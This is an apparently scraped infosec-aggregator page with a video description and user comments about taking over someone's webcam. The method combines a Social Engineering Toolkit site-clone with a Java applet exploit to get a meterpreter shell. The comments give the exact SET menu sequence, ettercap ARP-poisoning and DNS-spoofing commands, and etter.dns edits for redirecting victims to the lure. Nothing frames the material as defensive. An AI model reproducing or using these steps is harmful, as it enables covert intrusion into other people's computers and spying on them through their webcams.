Description: In this video i'll show how to "hack" into someones webcam using the Social engineering Toolkit + Java Exploit ;) what gains the attacker a meterpreter shell with this shell it is possbile to take a snapshot
Song - Face the Wolf - Well hello there, mothership Zeta
Tags: meterpreter , metasploit , webcam ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.
Very nice video, thanks.
The sequence he used in the video encase you missed it.
root@bt:~# cd /pentest/exploits/set/
root@bt:/pentest/exploits/set# ./set
Enter your choice: 2
Enter your choice (press enter for default): 1
Enter number (1-4): 2
Enter the url to clone: http://www.google.de
Enter choice (hit enter for default): 2
Enter your choice (enter for default): 2
Enter choice yes or no: no
Whaou !! Is Awesome !! What is a name Appz ?
It is possible to download ?
Thx
thx for the video , there is also a script in meterpreter that take a webcam snapshot every seond , and the result appear as a live video :)
Mika : the tools are SET (social engeneering toolkit)& metasploit both available by default in backtrack or you can just download them in any other linux distibution
I did the same but the box asking if I want to run the unverified application didnt appear. Any clues?
Im using BT5.
I am also having the same issue as luizfzs, i have my pc running windows7, a virtualbox vm with BT5, and a virtualbox VM running windows 7
If i open the IP of BT on my original win7 box, i get the java box popup.
But if i open the IP from the win7 VM, nothing happens no popup, i just get google, i have tried firefox 3,4,5 and ie8 and nothing.
Any suggestions?
Also would this infect my original PC if i open that Java applet? or would it disappear once my computer is restarted?
If this has polymorphic encoding and no AV know about this virus, it would stay on my PC yeah?
Hey guys, the thing is you have to spoof the DNS ;-)
you can do it with editing the etter.dns ;) and use it with ettercap just type in your ip for ex. 192.168.1.102 A www.google.de and then fire up ettercap with
ettercap -c -q etter.dns -M arp // // (for the full range)
I have been using a slightly different command for ettercap.
ettercap -T -q -i eth0 -P dns_spoof -M arp // //
Oh and make sure you edit the correct etter.dns
nano /usr/local/share/ettercap/etter.dns
Nice and easy one. Greetings from and to Germany. Also thanks to djekl ;)
does anyone have the procedure since the video was removed :(